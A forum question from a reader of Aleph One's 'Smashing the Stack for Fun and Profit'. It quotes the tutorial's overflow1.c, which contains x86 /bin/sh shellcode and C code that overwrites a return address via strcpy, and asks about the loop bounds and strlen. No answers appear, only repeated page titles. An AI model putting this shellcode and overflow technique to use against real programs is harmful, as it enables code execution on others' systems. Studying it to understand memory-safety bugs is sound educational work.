Understanding Aleph One's first buffer overflow exploit

Question

I am reading "Smashing The Stack For Fun And Profit" by Aleph one, and reached this spot:

overflow1.c
------------------------------------------------------------------------------
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

void main() {
  char buffer[96];
  int i;
  long *long_ptr = (long *) large_string;

  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  strcpy(buffer,large_string);
}

Now, I understand all the theory behind the exploit: the shellcode[] is in the data segment (which is writable), and contains the code to spawn a shell.

We would like to copy its content to main's buffer, in addition to overwrite main's return address to the beginning of the buffer (so that the execution control will be of our "spawning a shell" code. We do it by coping the shellcode to the large_string[] buffer (second for-loop), and the rest(???) of large_sting[] will contain the buffer's address (first for-loop).

Of course, main's return address will be overwritten by this buffer's address, since we copy large_string[] to buffer[] (strcpy).

My problem is with the little details of the exploit:

1.)

Why does the first for-loop is from i=0 to i=31? I mean, considering the pointer arithmetic, how does it work? [large_string[] is only 128 bytes]

2.)

What is srlen(shellcode)?

I would some clearing on that kind of stuff.

Thanks!

Understanding Aleph One's first buffer overflow exploit

Answers (1)

Related Questions

Understanding Aleph One&#39;s first buffer overflow exploit

Answers (1)

Related Questions

Understanding Aleph One's first buffer overflow exploit